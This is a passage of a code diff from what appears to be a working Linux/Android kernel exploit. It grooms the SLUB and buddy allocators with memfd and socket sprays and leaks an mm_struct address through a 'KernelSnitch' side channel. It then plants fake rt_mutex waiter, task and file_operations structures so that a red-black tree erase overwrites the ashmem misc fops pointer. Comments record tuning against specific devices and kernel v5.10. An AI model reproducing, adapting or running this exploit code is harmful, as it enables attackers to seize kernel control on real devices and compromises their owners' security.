+   * (~208KB) caps each pair at ~3 queued 64KB skbs; capacity comes from
+   * pair count.  With unreadable buddyinfo (free3 < 0) absorb the cap. */
+  while (order3_hold_pairs < ORDER3_HOLD_PAIRS_MAX && pages < max_pages) {
+    if (free3 >= 0 && free3 <= target)
+      break;
+    int p = order3_hold_pairs;
+    if (socketpair(AF_UNIX, SOCK_STREAM, 0, order3_hold_sv[p]) != 0)
+      break;
+    order3_hold_pairs++;
+    int sent = 0;
+    for (int i = 0; i < 3; i++) {
+      if (sendmsg(order3_hold_sv[p][0], msg, MSG_DONTWAIT) <= 0)
+        break;
+      sent++;
+    }
+    if (!sent) {
+      close(order3_hold_sv[p][0]);
+      close(order3_hold_sv[p][1]);
+      order3_hold_sv[p][0] = -1;
+      order3_hold_sv[p][1] = -1;
+      order3_hold_pairs--;
+      break;
+    }
+    skbs += sent;
+    pages += (long)sent * 2;   /* 64KB skb = 2 order-3 frag pages */
+    free3 = buddyinfo_order3_free();
+  }
+  pr_info("mm order3 absorb: pairs=%d skbs=%d free3 %ld -> %ld (target=%ld)\n",
+          order3_hold_pairs, skbs, before, free3, target);
+}
+
+static void order3_hold_end(void) {
+  if (!order3_hold_inited)   /* zero-init guard: never close() fd 0 */
+    return;
+  for (int p = 0; p < order3_hold_pairs; p++) {
+    for (int i = 0; i < 2; i++) {
+      if (order3_hold_sv[p][i] >= 0) {
+        close(order3_hold_sv[p][i]);
+        order3_hold_sv[p][i] = -1;
+      }
+    }
+  }
+  order3_hold_pairs = 0;
+}
+
+static void drain_reclaim_pair(int pair) {
+  unsigned char junk[65536];
+
+  for (;;) {
+    ssize_t got = recv(reclaim_sv[rb_cur][pair][1], junk, sizeof(junk),
+                       MSG_DONTWAIT);
+    if (got <= 0)
+      break;
+  }
+}
+
+static void release_prepare_drain_markers(void) {
+  size_t drain_triggers = prepare_ctx.mm_cnt / mm_objs_per_slab;
+  for (size_t i = 0; i < drain_triggers; i++) {
+    size_t index = i * mm_objs_per_slab;
+    if (prepare_ctx.memfds[index] >= 0) {
+      SYSCHK(close(prepare_ctx.memfds[index]));
+      prepare_ctx.memfds[index] = -1;
+    }
+  }
+}
+
+static void pre_leak_slab_flush(void) {
+  /* Flush cpu_partial and drain prepare_ctx markers BEFORE closing the
+   * leaked mm_struct.  This way the leaked slab becomes fully empty
+   * the instant memfd_leak closes; discard_slab fires on the same
+   * put_cpu_partial -> unfreeze_partials path without an extra
+   * scheduling round-trip.  No usleep/yield here — we want zero gap
+   * between the close and the first skb-send that reclaims the page. */
+  flush_mm_cpu_partial();
+  release_prepare_drain_markers();
+}
+
+static void abort_prepare_kernel_page(void) {
+  close_reclaim_sockets();
+  if (post_ctx.mm_cnt > 0 && post_ctx.memfds[post_ctx.mm_cnt - 1] >= 0) {
+    close(post_ctx.memfds[post_ctx.mm_cnt - 1]);
+    post_ctx.memfds[post_ctx.mm_cnt - 1] = -1;
+  }
+  for (size_t i = 0; i < prepare_ctx.mm_cnt; i++) {
+    if (prepare_ctx.memfds[i] >= 0) {
+      close(prepare_ctx.memfds[i]);
+      prepare_ctx.memfds[i] = -1;
+    }
+    if (prepare_ctx.childs[i] > 0) {
+      kill_child(prepare_ctx.childs[i]);
+      prepare_ctx.childs[i] = -1;
+    }
+  }
+  cleanup_page_prepare_state();
+}
+
+void prepare_ctxs(void) {
+  prepare_ctx.mm_cnt = 32 * mm_objs_per_slab;
+  prepare_ctx.childs = calloc(sizeof(pid_t), prepare_ctx.mm_cnt);
+  prepare_ctx.memfds = calloc(sizeof(int), prepare_ctx.mm_cnt);
+
+  spray_ctx.mm_cnt = (1 + MM_PARTIALS) * mm_objs_per_slab;
+  spray_ctx.childs = calloc(sizeof(pid_t), spray_ctx.mm_cnt);
+  spray_ctx.memfds = calloc(sizeof(int), spray_ctx.mm_cnt);
+
+  pre_ctx.mm_cnt = mm_objs_per_slab - 1;
+  pre_ctx.childs = calloc(sizeof(pid_t), pre_ctx.mm_cnt);
+  pre_ctx.memfds = calloc(sizeof(int), pre_ctx.mm_cnt);
+
+  post_ctx.mm_cnt = mm_objs_per_slab;
+  post_ctx.childs = calloc(sizeof(pid_t), post_ctx.mm_cnt);
+  post_ctx.memfds = calloc(sizeof(int), post_ctx.mm_cnt);
+}
+
+int prepare_skb_payload(uintptr_t base, int payload_mode) {
+  memset(skb_buf, 0, SKB_SEND_SIZE);
+
+  uintptr_t payload_base = base + SKB_DATA_DELTA;
+
+  fake_lock = payload_base + LOCK_OFF;
+  fake_w0 = payload_base + W0_OFF;
+  fake_task = payload_base + FAKE_TASK_OFF;
+  fake_fops = payload_base + FOPS_TABLE_OFF;
+  if (payload_mode == PAGE_PAYLOAD_exp64) {
+    /* Quest3/exp64 route (works on v5.10): no fake_w0 at all.  The write
+     * comes from the stamped stale waiter's OWN tree_entry during the
+     * chain walk's rt_mutex_dequeue(lock, waiter) (rtmutex.c step [7]):
+     * rb_erase_cached sees pc=fake_fops(RED), rb_right=0, rb_left=target
+     * → rb_set_parent(child=target, parent=fake_fops) writes
+     * *target = fake_fops.  Collateral: __rb_change_child stores `target`
+     * into fake_fops+0x08 (the "parent's" rb_right = fops .llseek slot),
+     * repaired later by repair_fake_fops_llseek().  Hence the page only
+     * needs: zeroed fake_lock, a detached fake_task, and the fops table. */
+    binwrite_target = payload_base + SCRATCH_OFF;
+    for (size_t chunk = 0; chunk < SKB_SEND_SIZE; chunk += ORDER3_SIZE) {
+      unsigned char *p = skb_buf + chunk + SKB_FRAG_BIAS;
+
+      /* fake_lock: all zero — wait_lock free, no owner, empty tree
+       * (memset above already zeroed it). */
+
+      /* fake_task: detached (pi_waiters empty), sane prio/usage so the
+       * walk's try_to_wake_up(fake_task) bails on __state==0. */
+      put32(p, FAKE_TASK_OFF + FAKE_TASK_USAGE_OFF, 0x100);
+      put32(p, FAKE_TASK_OFF + FAKE_TASK_PRIO_OFF, FAKE_TASK_PRIO);
+      put32(p, FAKE_TASK_OFF + FAKE_TASK_NORMAL_PRIO_OFF, FAKE_TASK_PRIO);
+      put32(p, FAKE_TASK_OFF + FAKE_TASK_PI_LOCK_OFF, 0);
+      put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF, 0);
+      put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF + 0x08, 0);
+      put64(p, FAKE_TASK_OFF + FAKE_TASK_TASK_GROUP_OFF,
+            text_addr(ROOT_TASK_GROUP));
+      put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_TOP_TASK_OFF,
+            text_addr(INIT_TASK));
+      put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_BLOCKED_ON_OFF, 0);
+
+      /* fops table; .llseek MUST be 0 (sacrificed by the rb write). */
+      put_fake_fops_table(p, FOPS_TABLE_OFF);
+      put64(p, FOPS_TABLE_OFF + FOPS_LLSEEK_OFF, 0);
+    }
+    return 1;
+  }
+  if (payload_mode == PAGE_PAYLOAD_FOPS) {
+    fake_parent = fake_fops;
+    fake_right = data_addr(ASHMEM_MISC_FOPS);
+    fake_left = 0;
+    binwrite_target = payload_base + SCRATCH_OFF;
+  } else {
+    fake_parent = data_addr(ASHMEM_MISC_FOPS) - 8;
+    fake_right = fake_fops;
+    fake_left = payload_base + LEFT_OFF;
+    binwrite_target = payload_base + FOPS_OFF + 0x700;
+  }
+
+#ifdef SLIDE_RECLAIM_SCAN_PHASE
+  if (payload_mode == PAGE_PAYLOAD_SLIDE) {
+    for (size_t chunk = 0; chunk < SKB_SEND_SIZE; chunk += ORDER3_SIZE) {
+      unsigned char *p = skb_buf + chunk;
+      for (size_t off = SLIDE_RECLAIM_SCAN_PHASE;
+           off + 0x20 <= ORDER3_SIZE; off += 0x20) {
+        put64(p, off + 0x08, 0x4141000000000000ULL | off);
+      }
+    }
+    return 1;
+  }
+#endif
+
+  /* FOPS mode: one-child rb_erase at pi_tree_entry writes fake_fops to
+   * ASHMEM_MISC_FOPS:  parent = ASHMEM_MISC_FOPS-8 → __rb_change_child()
+   * stores the child (fake_fops) into parent->rb_right (= target).
+   * color MUST be RED (0): a BLACK erased node would make __rb_erase_color
+   * walk ashmem_misc/fake_fops as rb nodes (rotate/recolor garbage).
+   *
+   * v5.10 geometry (rtmutex.c:721 dequeue + :722 enqueue):
+   *  - rb_left=fake_fops / rb_right=0: rb_erase takes the one-child path
+   *    with child=fake_fops (the write value).  rb_next(fake_w0) then has
+   *    rb_right==0 and walks UP to parent=ASHMEM_MISC_FOPS-8, returning it
+   *    as the new cached leftmost — it never descends into the fops table.
+   *  - fake_task->pi_waiters.rb_node stays NULL (detached root, see below),
+   *    so the post-write rt_mutex_enqueue_pi(stale) inserts into an EMPTY
+   *    tree: parent==NULL → node colored BLACK → break.  Zero fixup
+   *    iterations, zero recolors/rotations touching the fops table —
+   *    .owner survives as fake_w0|1 and try_module_get() at open() passes
+   *    (a fixup recolor to (fake_w0+0x18)|1 made module->state read the
+   *    pi_tree_entry self-pointer → ENODEV, observed on the live target). */
+  uintptr_t write_pc = (data_addr(ASHMEM_MISC_FOPS) - 8); /* color=RED */
+  uintptr_t write_right = 0;
+  uintptr_t write_left = fake_fops;
+  uint64_t waiter_task = text_addr(INIT_TASK);
+  uint64_t task_group = text_addr(ROOT_TASK_GROUP);
+  uint64_t pi_top_task = text_addr(INIT_TASK);
+  uint32_t waiter_prio = FAKE_WAITER_PRIO;
+  if (payload_mode == PAGE_PAYLOAD_SLIDE) {
+    write_pc = SLIDE_LOGGERS_0_1 + slide_p0_offset;
+    write_right = 0;
+    write_left = SLIDE_RANDOM_BOOT_ID_DATA + slide_p0_offset;
+#if defined(SLIDE_USE_FAKE_TASK) && SLIDE_USE_FAKE_TASK
+    waiter_task = fake_task;
+    task_group = 0;
+    pi_top_task = fake_task;
+#else
+    waiter_task = SLIDE_INIT_TASK + slide_p0_offset;
+    task_group = SLIDE_ROOT_TASK_GROUP + slide_p0_offset;
+    pi_top_task = SLIDE_INIT_TASK + slide_p0_offset;
+#endif
+    waiter_prio = SLIDE_FAKE_WAITER_PRIO;
+  }
+
+  for (size_t chunk = 0; chunk < SKB_SEND_SIZE; chunk += ORDER3_SIZE) {
+    unsigned char *p = skb_buf + chunk + SKB_FRAG_BIAS;
+
+    put32(p, LOCK_OFF + 0x00, 0);
+    if (payload_mode == PAGE_PAYLOAD_SLIDE) {
+      put64(p, LOCK_OFF + 0x08, fake_w0);
+      put64(p, LOCK_OFF + 0x10, fake_w0);
+      put64(p, LOCK_OFF + 0x18, SLIDE_LOCK_OWNER_VALUE);
+    } else {
+      put64(p, LOCK_OFF + 0x08, fake_w0);
+      put64(p, LOCK_OFF + 0x10, fake_w0);
+      put64(p, LOCK_OFF + 0x18, fake_task | 1);
+    }
+
+    put64(p, W0_OFF + 0x00, 1);
+    put64(p, W0_OFF + 0x08, 0);
+    put64(p, W0_OFF + 0x10, 0);
+    put32(p, W0_OFF + FAKE_WAITER_TREE_PRIO_OFF, waiter_prio);
+    put64(p, W0_OFF + FAKE_WAITER_TREE_DEADLINE_OFF, 0);
+    put64(p, W0_OFF + FAKE_WAITER_PI_TREE_ENTRY_OFF + 0x00, write_pc);
+    put64(p, W0_OFF + FAKE_WAITER_PI_TREE_ENTRY_OFF + 0x08, write_right);
+    put64(p, W0_OFF + FAKE_WAITER_PI_TREE_ENTRY_OFF + 0x10, write_left);
+    put32(p, W0_OFF + FAKE_WAITER_PI_TREE_PRIO_OFF, waiter_prio);
+    put64(p, W0_OFF + FAKE_WAITER_PI_TREE_DEADLINE_OFF, 0);
+    put64(p, W0_OFF + FAKE_WAITER_TASK_OFF, waiter_task);
+    put64(p, W0_OFF + FAKE_WAITER_LOCK_OFF, fake_lock);
+    put32(p, W0_OFF + FAKE_WAITER_WAKE_STATE_OFF, 0);
+    put64(p, W0_OFF + FAKE_WAITER_WW_CTX_OFF, 0);
+
+    put32(p, FAKE_TASK_OFF + FAKE_TASK_USAGE_OFF, 0x100);
+    put32(p, FAKE_TASK_OFF + FAKE_TASK_PRIO_OFF, FAKE_TASK_PRIO);
+    put32(p, FAKE_TASK_OFF + FAKE_TASK_NORMAL_PRIO_OFF, FAKE_TASK_PRIO);
+    put32(p, FAKE_TASK_OFF + FAKE_TASK_PI_LOCK_OFF, 0);
+    if (payload_mode == PAGE_PAYLOAD_FOPS) {
+      /* Detached root: pi_waiters.rb_node = NULL, only the cached leftmost
+       * points at the fake waiter.  rb_erase_cached() still runs rb_next +
+       * rb_erase on it (node links are self-contained: parent = ASHMEM_MISC
+       * _FOPS-8, rb_left = fake_fops), so the rb_write lands, but the tree
+       * itself stays EMPTY — the post-write rt_mutex_enqueue_pi() then
+       * inserts the stale waiter as root with parent==NULL, i.e. ZERO
+       * rb_insert_color fixup iterations that would otherwise recolor/
+       * rotate the fake fops table (its .owner got clobbered to
+       * (fake_w0+0x18)|1 → try_module_get failure → ENODEV at open). */
+      put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF, 0);
+      put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF + 0x08,
+            fake_w0 + FAKE_WAITER_PI_TREE_ENTRY_OFF);
+    } else {
+      put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF,
+            fake_w0 + FAKE_WAITER_PI_TREE_ENTRY_OFF);
+      put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF + 0x08,
+            fake_w0 + FAKE_WAITER_PI_TREE_ENTRY_OFF);
+    }
+    put64(p, FAKE_TASK_OFF + FAKE_TASK_TASK_GROUP_OFF, task_group);
+    put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_TOP_TASK_OFF, pi_top_task);
+    put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_BLOCKED_ON_OFF, 0);
+
+    put64(p, RIGHT_OFF + 0x00, fake_parent);
+    put64(p, RIGHT_OFF + 0x08, 0);
+    put64(p, RIGHT_OFF + 0x10, 0);
+
+    put64(p, LEFT_OFF + 0x00, fake_parent);
+    put64(p, LEFT_OFF + 0x08, 0);
+    put64(p, LEFT_OFF + 0x10, 0);
+
+    if (payload_mode == PAGE_PAYLOAD_FOPS) {
+      put_fake_fops_table(p, FOPS_TABLE_OFF);
+    }
+  }
+  return 1;
+}
+
+uintptr_t prepare_kernel_page(int payload_mode) {
+  reclaim_batch_next();   /* never close the previous batch: see reclaim_sv */
+  mm_objs_per_slab = ORDER3_SIZE / MM_STRUCT_SZ;
+  prepare_ctxs();
+
+  skb_buf = malloc(SKB_SEND_SIZE);
+  memset(skb_buf, 0x41, SKB_SEND_SIZE);
+
+  for (size_t i = 0; i < prepare_ctx.mm_cnt; i++) {
+    prepare_ctx.childs[i] = clone_child();
+  }
+  for (size_t i = 0; i < prepare_ctx.mm_cnt; i++) {
+    prepare_ctx.memfds[i] = open_memfd(prepare_ctx.childs[i]);
+  }
+
+  for (size_t i = 0; i < spray_ctx.mm_cnt; i++) {
+    spray_ctx.childs[i] = clone_child();
+    spray_ctx.memfds[i] = open_memfd(spray_ctx.childs[i]);
+  }
+
+  int cpu_count = (int)sysconf(_SC_NPROCESSORS_ONLN);
+  int ks_verbose = env_int_range("KERNELSNITCH_VERBOSE", 0, 0, 1);
+  ks = kernelsnitch_setup(
+      MM_STRUCT_SZ, MM_ORDER, cpu_count, KSNITCH_COLLISIONS, ks_verbose, 0);
+
+  for (size_t i = 0; i < pre_ctx.mm_cnt; i++) {
+    pre_ctx.childs[i] = clone_child();
+  }
+  child_leak = clone_leak_child();
+  for (size_t i = 0; i < post_ctx.mm_cnt; i++) {
+    post_ctx.childs[i] = clone_child();
+  }
+
+  for (size_t i = 0; i < pre_ctx.mm_cnt; i++) {
+    pre_ctx.memfds[i] = open_memfd(pre_ctx.childs[i]);
+  }
+  memfd_leak = open_memfd(child_leak);
+  for (size_t i = 0; i < post_ctx.mm_cnt; i++) {
+    post_ctx.memfds[i] = open_memfd(post_ctx.childs[i]);
+  }
+
+  for (size_t i = 0; i < pre_ctx.mm_cnt; i++) {
+    kill_child(pre_ctx.childs[i]);
+  }
+  for (size_t i = 0; i < post_ctx.mm_cnt; i++) {
+    kill_child(post_ctx.childs[i]);
+  }
+  for (size_t i = 0; i < spray_ctx.mm_cnt; i++) {
+    kill_child(spray_ctx.childs[i]);
+  }
+  /* Kill the prepare children early too: their mm_structs must be
+   * pinned solely by the memfds (refcount 1) so that closing a
+   * prepare memfd below actually frees the mm_struct — the v5.10
+   * cpu_partial drain before close(memfd_leak) depends on it. */
+  for (size_t i = 0; i < prepare_ctx.mm_cnt; i++) {
+    kill_child(prepare_ctx.childs[i]);
+    prepare_ctx.childs[i] = -1;
+  }
+  SYSCHK(waitpid(child_leak, NULL, 0));
+
+  if (!kernelsnitch_found_collisions(ks)) {
+    pr_warning("KernelSnitch collision finding failed\n");
+    kernelsnitch_cleanup(ks);
+    ks = NULL;
+    for (size_t i = 0; i < prepare_ctx.mm_cnt; i++) {
+      kill_child(prepare_ctx.childs[i]);
+    }
+    cleanup_page_prepare_state();
+    return 0;
+  }
+
+  kernelsnitch_bruteforce(ks);
+  uintptr_t leaked = ks->mm_struct;
+  if (leaked == (uintptr_t)-1) {
+    pr_warning("KernelSnitch mm_struct leak failed\n");
+    kernelsnitch_cleanup(ks);
+    ks = NULL;
+    for (size_t i = 0; i < prepare_ctx.mm_cnt; i++) {
+      kill_child(prepare_ctx.childs[i]);
+    }
+    cleanup_page_prepare_state();
+    return 0;
+  }
+
+  uintptr_t base = leaked & ~(ORDER3_SIZE - 1);
+  last_leaked_mm = leaked;
+  pr_info("mm leaked=%016zx base=%016zx object_index=%zu\n",
+          leaked, base, (leaked - base) / MM_STRUCT_SZ);
+  if (!prepare_skb_payload(base, payload_mode)) {
+    kernelsnitch_cleanup(ks);
+    ks = NULL;
+    for (size_t i = 0; i < prepare_ctx.mm_cnt; i++) {
+      kill_child(prepare_ctx.childs[i]);
+    }
+    cleanup_page_prepare_state();
+    return 0;
+  }
+
+  const int oppo_teardown = use_oppo_reclaim_teardown();
+  if (oppo_teardown) {
+    pr_info("mm reclaim teardown: oppo-ghostlock profile\n");
+  }
+
+  if (oppo_teardown) {
+    SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, reclaim_sv[rb_cur][0]));
+    int sndbuf = 1 << 20;
+    setsockopt(reclaim_sv[rb_cur][0][0], SOL_SOCKET, SO_SNDBUF, &sndbuf,
+               sizeof(sndbuf));
+    int reclaim_flags = fcntl(reclaim_sv[rb_cur][0][0], F_GETFL, 0);
+    if (reclaim_flags >= 0) {
+      fcntl(reclaim_sv[rb_cur][0][0], F_SETFL, reclaim_flags | O_NONBLOCK);
+    }
+  } else {
+    init_reclaim_sv();
+    int sndbuf = 1 << 20;
+    for (int p = 0; p < SKB_RECLAIM_PAIRS; p++) {
+      SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, reclaim_sv[rb_cur][p]));
+      setsockopt(reclaim_sv[rb_cur][p][0], SOL_SOCKET, SO_SNDBUF, &sndbuf,
+                 sizeof(sndbuf));
+      int reclaim_flags = fcntl(reclaim_sv[rb_cur][p][1], F_GETFL, 0);
+      if (reclaim_flags >= 0) {
+        fcntl(reclaim_sv[rb_cur][p][1], F_SETFL, reclaim_flags | O_NONBLOCK);
+      }
+    }
+  }
+  int pcp_shaping_sv[2];
+  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, pcp_shaping_sv));
+
+  struct iovec iov;
+  memset(&iov, 0, sizeof(iov));
+  size_t send_sz = oppo_teardown ? (size_t)SKB_SEND_SIZE : skb_send_bytes();
+  last_skb_send_size = send_sz;
+
+  iov.iov_base = skb_buf;
+  iov.iov_len = send_sz;
+
+  struct msghdr msg;
+  memset(&msg, 0, sizeof(msg));
+  msg.msg_iov = &iov;
+  msg.msg_iovlen = 1;
+
+  SYSCHK(sendmsg(pcp_shaping_sv[0], &msg, 0));
+
+  pin_to_core(CORE);
+  sched_yield();
+  sched_yield();
+  sched_yield();
+  sched_yield();
+  track_mm_page(base, "pre-close");
+  for (size_t i = 0; i < pre_ctx.mm_cnt; i++) {
+    SYSCHK(close(pre_ctx.memfds[i]));
+    pre_ctx.memfds[i] = -1;
+  }
+  if (oppo_teardown) {
+    for (size_t i = 0; i < post_ctx.mm_cnt - 1; i++) {
+      SYSCHK(close(post_ctx.memfds[i]));
+      post_ctx.memfds[i] = -1;
+    }
+    if (use_skb_close_last_mm()) {
+      size_t last = post_ctx.mm_cnt - 1;
+      if (post_ctx.memfds[last] >= 0) {
+        SYSCHK(close(post_ctx.memfds[last]));
+        post_ctx.memfds[last] = -1;
+        pr_info("mm reclaim: SKB_CLOSE_LAST_MM=1 (closed post_ctx[last])\n");
+      }
+    }
+  } else {
+    for (size_t i = 0; i < post_ctx.mm_cnt; i++) {
+      SYSCHK(close(post_ctx.memfds[i]));
+      post_ctx.memfds[i] = -1;
+    }
+  }
+  for (size_t i = 0; i < spray_ctx.mm_cnt; i += mm_objs_per_slab) {
+    SYSCHK(close(spray_ctx.memfds[i]));
+    spray_ctx.memfds[i] = -1;
+  }
+  track_mm_page(base, "markers-closed");
+
+  SYSCHK(close(pcp_shaping_sv[0]));
+  SYSCHK(close(pcp_shaping_sv[1]));
+
+  /* --- v5.10 SLUB cpu_partial drain --------------------------------
+   * The pre/post/marker closes above left the leaked slab FROZEN on
+   * this CPU's SLUB cpu_partial list with inuse=1.  On v5.10 a plain
+   * object free can NEVER discard a frozen slab (__slab_free takes the
+   * FREE_FROZEN path and never calls discard_slab), so the leak slab
+   * only reaches buddy once it is (a) empty AND (b) moved to the NODE
+   * partial list by unfreeze_partials with nr_partial >= min_partial(5).
+   *
+   * The drain must therefore run AFTER close(memfd_leak) empties the
+   * slab (the upstream/S25U ordering): close(memfd_leak) drops the slab
+   * to inuse=0 while frozen, then the late drain below forces
+   * unfreeze_partials, which moves the frozen+empty slab to the node
+   * partial list and discards it.  Draining BEFORE the close (the
+   * earlier reorder) unfreezes the slab while it still holds its one
+   * live object, so the slab is parked on the node partial list and the
+   * final free never discards — the page never reaches buddy
+   * (GDB-verified on b0q: zero discard_slab hits).
+   * ---------------------------------------------------------------- */
+  if (!oppo_teardown)
+    log_mm_slabinfo("before-leak-close");
+
+  /* enable trace BEFORE the close so trace_marker doesn't schedule
+   * between close and first sendmsg */
+  page_reclaim_trace_begin();
+
+  /* Warm cpu_slab + flood (legacy oppo/v6.x profile only). */
+  enum { WARM_N = MM_CPU_PARTIAL + 2 };
+  int warm_fds[WARM_N];
+  size_t wn = 0;
+  if (oppo_teardown) {
+    for (; wn < WARM_N; wn++) {
+      warm_fds[wn] = clone_memfd();
+      if (warm_fds[wn] < 0) break;
+    }
+    for (int i = 0; i < 200; i++) {
+      int fd = clone_memfd();
+      if (fd < 0) break;
+      SYSCHK(close(fd));
+    }
+  }
+
+  /* Step 1: close the leaked mm_struct.  The pre/post closes above left
+   * the leak slab FROZEN on this CPU's SLUB cpu_partial list with
+   * inuse=1, so this last free takes the FREE_FROZEN path — the slab
+   * drops to inuse=0 but is NOT discarded (v5.10 never discards a
+   * frozen slab from __slab_free). */
+  SYSCHK(close(memfd_leak));
+  memfd_leak = -1;
+  track_mm_page(base, "leak-closed");
+
+  /* Order-0 prefill must land AFTER the leak close and BEFORE the drain
+   * below triggers discard_slab: it keeps the buddy's order-0 lists stocked
+   * so the order-3 leak page survives whole until the skb frags take it. */
+  if (!oppo_teardown)
+    prefill_order0_buddy();
+
+  /* Hold a pile of order-3 skb frag pages so free_area[3][UNMOVABLE] is
+   * short when the drain below discards the leak page (see order3_hold_begin). */
+  if (!oppo_teardown)
+    order3_hold_begin(&msg);
+
+  /* Step 2: late drain.  Free one object from each still-full
+   * prepare_ctx slab (stride = objects/slab) so put_cpu_partial(drain=1)
+   * overflows the frozen chain past cpu_partial(13) and runs
+   * unfreeze_partials AFTER the leak slab is empty.  The frozen+empty
+   * leak slab then moves to the NODE partial list where
+   * discard_slab() fires (inuse==0 && nr_partial >= min_partial(5))
+   * and its order-3 page lands on buddy free_area[3] — exactly the
+   * upstream (S25U) ordering; the earlier drain-first reorder left the
+   * leak slab stranded frozen+empty (GDB-verified: zero discard_slab
+   * hits, page never reaches buddy).
+   * No mm_struct allocation may happen between step 1 and the sends —
+   * a fresh mm alloc could reactivate the leak slab as cpu_slab. */
+  if (!oppo_teardown) {
+    for (size_t i = 0; i < prepare_ctx.mm_cnt; i += mm_objs_per_slab) {
+      if (prepare_ctx.memfds[i] >= 0) {
+        SYSCHK(close(prepare_ctx.memfds[i]));
+        prepare_ctx.memfds[i] = -1;
+      }
+    }
+  }
+  /* NO track_mm_page("drained") here: the call's tracefs open does a zeroed
+   * order-3 kmalloc that steals the just-discarded leak page before the
+   * sends can capture it (see use_mm_track).  The drained-state read is
+   * emitted post-capture instead (below, next to "sent"). */
+
+  /* Clean up the warm mm_structs (oppo profile only). */
+  for (size_t i = 0; i < wn; i++)
+    SYSCHK(close(warm_fds[i]));
+
+  /* Hold-all (default, IonStackQuest3 semantics): every reclaim skb stays
+   * QUEUED on its pair through the cfi/pipe stages, so every order-3 page
+   * the sends captured — the leak page among them — keeps its payload until
+   * close_reclaim_sockets() at the next prepare.  The old drain-cycling
+   * (SKB_DRAIN_SENDS=1) freed each skb right after receipt and pinned only
+   * one final head page; with b0q's tail-insert/shuffle buddy frees the
+   * leak page usually sat mid-list and was never captured — the payload
+   * never landed, the page was recycled as live mm_structs by the exp64
+   * child's own fork/exec churn, and the stale misc.fops then crashed
+   * misc_open (GDB-verified 2026-08-07: 10/10 attempts missed, die at
+   * misc_open+292 blr to junk f_op->open).  wmem_max (~208KB) caps each
+   * pair at ~3 queued 64KB skbs, so hold mode defaults to 3 per pair. */
+  int drain_sends = env_flag("SKB_DRAIN_SENDS", 0);
+  int reclaim_want =
+      env_int_range("PAGE_RECLAIM_SENDS",
+                    drain_sends ? SKB_RECLAIM_SENDS : SKB_RECLAIM_PAIRS * 3,
+                    1, 64);
+  last_skb_reclaim_want = reclaim_want;
+  int skb_sent = 0;
+  if (oppo_teardown) {
+    for (int i = 0; i < reclaim_want; i++) {
+      errno = 0;
+      ssize_t sent = sendmsg(reclaim_sv[rb_cur][0][0], &msg, MSG_DONTWAIT);
+      int saved_errno = errno;
+      pr_info("sk_buff reclaim send %d/%d ret=%zd errno=%d\n",
+              i + 1, reclaim_want, sent, saved_errno);
+      if (sent > 0) {
+        skb_sent++;
+      } else {
+        break;
+      }
+    }
+  } else if (drain_sends) {
+    for (int i = 0; i < reclaim_want; i++) {
+      int pair = i % SKB_RECLAIM_PAIRS;
+      errno = 0;
+      ssize_t sent = sendmsg(reclaim_sv[rb_cur][pair][0], &msg, 0);
+      if (sent > 0) {
+        skb_sent++;
+        drain_reclaim_pair(pair);
+        continue;
+      }
+      if (errno == EAGAIN || errno == EWOULDBLOCK) {
+        drain_reclaim_pair(pair);
+        errno = 0;
+        sent = sendmsg(reclaim_sv[rb_cur][pair][0], &msg, MSG_DONTWAIT);
+        if (sent > 0) {
+          skb_sent++;
+          drain_reclaim_pair(pair);
+        }
+      }
+    }
+  } else {
+    /* Hold-all: queue each skb undrained.  Round-robin over the pairs;
+     * a full pair reports EAGAIN (MSG_DONTWAIT) — the pairs fill evenly,
+     * so the first failure means every pair is at capacity. */
+    for (int i = 0; i < reclaim_want; i++) {
+      int pair = i % SKB_RECLAIM_PAIRS;
+      ssize_t sent = sendmsg(reclaim_sv[rb_cur][pair][0], &msg, MSG_DONTWAIT);
+      if (sent <= 0)
+        break;
+      skb_sent++;
+    }
+  }
+  page_reclaim_trace_end();
+  last_skb_reclaim_sent = skb_sent;
+
+  /* Stability hold (drain-cycling mode only): leave one payload skb queued
+   * (undrained) so the reclaimed page_base stays allocated through the
+   * pselect/cfi/pipe stages.  Without this the page floats in the buddy
+   * allocator and the pipe prepare child's sprays reclaim it — clobbering
+   * the fake fops table (arb-r/w then reads 0, or CFI panics on close).
+   * The send re-sprays the same payload, so page_base keeps valid contents.
+   * Hold-all mode needs no separate hold: every queued skb is a hold. */
+  if (!oppo_teardown && drain_sends) {
+    ssize_t held = sendmsg(reclaim_sv[rb_cur][0][0], &msg, MSG_DONTWAIT);
+    if (held <= 0) {
+      drain_reclaim_pair(0);
+      held = sendmsg(reclaim_sv[rb_cur][0][0], &msg, MSG_DONTWAIT);
+    }
+    pr_info("mm skb reclaim hold=%zd (page pinned)\n", held);
+  }
+  /* The capture is secured (the reclaim batch holds the leak page), so the
+   * absorb pile is released every round: keeping it pinned saturated the
+   * pair table by round 3 and blew RLIMIT_NOFILE by round 8 (run 3).
+   * The freed pile pages land at the free_area[3] tail and are re-absorbed
+   * at the next round's order3_hold_begin(). */
+  if (!oppo_teardown)
+    order3_hold_end();
+  track_mm_page(base, "drained");   /* post-capture: can only steal a */
+  track_mm_page(base, "sent");      /* harmless split-remainder page   */
+
+  pr_info("mm skb reclaim sends=%d/%d (pairs=%d%s)\n",
+          skb_sent, reclaim_want,
+          oppo_teardown ? 1 : SKB_RECLAIM_PAIRS,
+          oppo_teardown ? " oppo" : (drain_sends ? " drain" : " hold"));
+
+  if (!oppo_teardown && payload_mode == PAGE_PAYLOAD_FOPS &&
+      !verify_fops_on_page(base)) {
+    pr_warning("skb reclaim: fops signature missing at base %016zx\n", base);
+    kernelsnitch_cleanup(ks);
+    ks = NULL;
+    abort_prepare_kernel_page();
+    return 0;
+  }
+
+  kernelsnitch_cleanup(ks);
+  ks = NULL;
+
+  for (size_t i = 0; i < prepare_ctx.mm_cnt; i++) {
+    if (prepare_ctx.memfds[i] >= 0) {
+      SYSCHK(close(prepare_ctx.memfds[i]));
+      prepare_ctx.memfds[i] = -1;
+    }
